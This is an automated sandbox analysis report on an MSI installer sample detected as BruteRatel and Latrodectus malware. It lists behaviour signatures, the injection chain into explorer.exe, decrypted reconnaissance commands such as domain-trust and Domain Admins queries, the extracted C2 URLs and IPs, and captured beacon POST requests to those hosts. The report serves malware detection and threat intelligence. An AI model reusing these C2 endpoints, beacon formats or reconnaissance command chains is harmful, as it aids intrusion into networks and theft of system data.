Windows Analysis Report
medk.msi

Overview

General Information

Sample name: medk.msi
Analysis ID: 1555319
MD5: 8cb04bf931a19fa0ae1bd7235180dd4a
SHA1: dfc980a827dbde294ae9fa6e63545d1d57344e96
SHA256: dfff1a07429ff9585f3dab9c78b501174e7c326e1fb95c5234368071b5426768
Tags: msi, user-pr0xylife
Infos:

Detection

BruteRatel, Latrodectus
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected BruteRatel
Yara detected Latrodectus
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Drops executables to the windows directory (C:\Windows) and starts them
Injects a PE file into foreign processes
Injects code into the Windows Explorer (explorer.exe)
Sample uses string decryption to hide its real strings
Sets debug register (to hijack the execution of another thread)
Sigma detected: RunDLL32 Spawning Explorer
Writes to foreign memory regions
Abnormal high CPU Usage
Checks for available system drives (often done to infect USB drives)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • msiexec.exe (PID: 2788 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\medk.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 6184 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 4592 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 31D436F1086AC158C6FA541C36CED057 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MSI8F42.tmp (PID: 2120 cmdline: "C:\Windows\Installer\MSI8F42.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\tab.dll, Object MD5: B9545ED17695A32FACE8C3408A6A3553)
  • rundll32.exe (PID: 2036 cmdline: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\tab.dll, Object MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 3784 cmdline: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\tab.dll, Object MD5: EF3179D498793BF4234F708D3BE28633)
      • explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
Name: Brute Ratel C4, BruteRatel
Description: Brute Ratel C4 (BRC4) is a commercial framework for red-teaming and adversarial attack simulation, which made its first appearance in December 2020. It was specifically designed to evade detection by endpoint detection and response (EDR) and antivirus (AV) capabilities. BRC4 allows operators to deploy a backdoor agent known as Badger (aka BOLDBADGER) within a target environment. This agent enables arbitrary command execution, facilitating lateral movement, privilege escalation, and the establishment of additional persistence avenues. The Badger backdoor agent can communicate with a remote server via DNS over HTTPS, HTTP, HTTPS, SMB, and TCP, using custom encrypted channels. It supports a variety of backdoor commands including shell command execution, file transfers, file execution, and credential harvesting. Additionally, the Badger agent can perform tasks such as port scanning, screenshot capturing, and keystroke logging. Notably, in September 2022, a cracked version of Brute Ratel C4 was leaked in the cybercriminal underground, leading to its use by threat actors.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4

Name: Latrodectus, Latrodectus
Description: First discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.latrodectus
{"C2 url": ["https://rolefenik.com/test/", "https://ergiholim.com/test/"], "Group Name": "Theta", "Campaign ID": 1989698107}
Source | Rule | Description | Author | Strings
00000006.00000003.2232622768.000002931397B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BruteRatel_1 | Yara detected BruteRatel | Joe Security |
00000008.00000002.4591745236.000000000E21B000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Latrodectus | Yara detected Latrodectus | Joe Security |
00000006.00000003.2232567502.000002931397B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BruteRatel_1 | Yara detected BruteRatel | Joe Security |
00000006.00000003.2232697308.000002931397B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BruteRatel_1 | Yara detected BruteRatel | Joe Security |
Process Memory Space: rundll32.exe PID: 3784 | JoeSecurity_BruteRatel_1 | Yara detected BruteRatel | Joe Security |

System Summary

Source: Process started; Author: elhoim, CD_ROM_; Data: Command: C:\Windows\Explorer.EXE, CommandLine: C:\Windows\Explorer.EXE, CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\tab.dll, Object, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 3784, ParentProcessName: rundll32.exe, ProcessCommandLine: C:\Windows\Explorer.EXE, ProcessId: 4004, ProcessName: explorer.exe

AV Detection

            Source: 8.2.explorer.exe.2e00000.0.unpackMalware Configuration Extractor: Latrodectus {"C2 url": ["https://rolefenik.com/test/", "https://ergiholim.com/test/"], "Group Name": "Theta", "Campaign ID": 1989698107}
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: /c ipconfig /all
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: /c systeminfo
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: C:\Windows\System32\cmd.exe
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: C:\Windows\System32\cmd.exe
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: /c nltest /domain_trusts
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: /c net view /all
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: C:\Windows\System32\cmd.exe
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: /c nltest /domain_trusts /all_trusts
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: C:\Windows\System32\cmd.exe
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: /c net view /all /domain
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: &ipconfig=
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: C:\Windows\System32\cmd.exe
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: C:\Windows\System32\cmd.exe
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: /c net group "Domain Admins" /domain
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: C:\Windows\System32\cmd.exe
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: C:\Windows\System32\wbem\wmic.exe
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: /c net config workstation
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: C:\Windows\System32\cmd.exe
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: C:\Windows\System32\cmd.exe
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: /c whoami /groups
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: C:\Windows\System32\cmd.exe
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: &systeminfo=
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: &domain_trusts=
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: &domain_trusts_all=
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: &net_view_all_domain=
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: &net_view_all=
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: &net_group=
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: &wmic=
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: &net_config_ws=
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: &net_wmic_av=
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: &whoami_group=
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: "pid":
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: "%d",
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: "proc":
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: "%s",
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: "subproc": [
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: &proclist=[
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: "pid":
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: "%d",
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: "proc":
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: "%s",
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: "subproc": [
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: &desklinks=[
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: *.*
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: "%s"
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: Update_%x
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: Custom_update
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: .dll
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: .exe
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: Error
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: runnung
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: %s/%s
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: front
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: /files/
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: Theta
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: Content-Type: application/x-www-form-urlencoded
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: Cookie:
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: POST
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: GET
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: curl/7.88.1
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: CLEARURL
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: URLS
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: COMMAND
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: ERROR
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: Q7OdWkarzqrRLA0CTqAqpAml9eHeQs1xfzbY2FZci6KNYp0yryEZjbrqmR2ozu5A
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: [{"data":"
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: "}]
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: &dpost=
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: https://rolefenik.com/test/
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: https://ergiholim.com/test/
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: \*.dll
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: AppData
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: Desktop
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: Startup
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: Personal
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: Local AppData
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: <html>
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: <!DOCTYPE
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: %s%d.dll
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: Content-Length: 0
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: Content-Type: application/dns-message
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: Content-Type: application/ocsp-request
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: 12345
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: 12345
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: &stiller=
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: %s%d.exe
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: %x%x
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: &mac=
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: %02x
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: :%02x
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: &computername=%s
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: &domain=%s
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: %04X%04X%04X%04X%08X%04X
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: LogonTrigger
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: %04X%04X%04X%04X%08X%04X
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: \Registry\Machine\
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: TimeTrigger
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: PT0H%02dM
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: %04d-%02d-%02dT%02d:%02d:%02d
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: PT0S
            Source: 8.2.explorer.exe.2e00000.0.unpack, String decryptor: \update_data.dat
            Source: unknown, HTTPS traffic detected: 104.21.92.105:443 -> 192.168.2.6:49988 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 104.21.15.162:443 -> 192.168.2.6:49989 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 104.21.15.162:443 -> 192.168.2.6:50001 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 104.21.92.105:443 -> 192.168.2.6:50026 version: TLS 1.2
            Source: unknown, HTTPS traffic detected: 104.21.92.105:443 -> 192.168.2.6:50077 version: TLS 1.2
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI8F42.tmp, 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp, MSI8F42.tmp, 00000004.00000000.2131539788.0000000000337000.00000002.00000001.01000000.00000003.sdmp, medk.msi, MSI8F42.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr
            Source: Binary string: eplgOutlook.pdb source: rundll32.exe, 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmp, tab.dll.2.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: medk.msi, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: medk.msi, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI8F42.tmp, 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp, MSI8F42.tmp, 00000004.00000000.2131539788.0000000000337000.00000002.00000001.01000000.00000003.sdmp, medk.msi, MSI8F42.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr
            Source: C:\Windows\System32\msiexec.exe, File opened: z:, x:, v:, t:, r:, p:, n:, l:, j:, h:, f:, b:, y:, w:, u:, s:, q:, o:, m:, k:, i:, g:, e:, c:, a:
            Source: C:\Windows\Installer\MSI8F42.tmp, Code function: 4_2_0032AF79 FindFirstFileExW,4_2_0032AF79
            Source: C:\Windows\explorer.exe, Code function: 8_2_02E0A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,8_2_02E0A8E0
            Source: C:\Windows\explorer.exe, Code function: 8_2_02E02B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,8_2_02E02B28

            Networking

            Source: Network traffic, Suricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50011 -> 104.21.15.162:443
            Source: C:\Windows\System32\rundll32.exe, Network Connect: 87.120.37.120 9043
            Source: C:\Windows\System32\rundll32.exe, Network Connect: 45.143.166.230 9043
            Source: Malware configuration extractor, URLs: https://rolefenik.com/test/
            Source: Malware configuration extractor, URLs: https://ergiholim.com/test/
            Source: global traffic, TCP traffic: 192.168.2.6:49710 -> 45.143.166.230:9043
            Source: global traffic, TCP traffic: 192.168.2.6:49982 -> 87.120.37.120:9043
            Source: Joe Sandbox View, ASN Name: NETERRA-ASBG NETERRA-ASBG
            Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox View, ASN Name: ITTITT-ASRU ITTITT-ASRU
            Source: Joe Sandbox View, JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49988 -> 104.21.92.105:443
            Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.6:49754
            Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.6:49956
            Source: global traffic, HTTP traffic detected: POST /test/ HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: rolefenik.com Content-Length: 92 Cache-Control: no-cache
            Source: global traffic, HTTP traffic detected: POST /test/ HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: ergiholim.com Content-Length: 92 Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
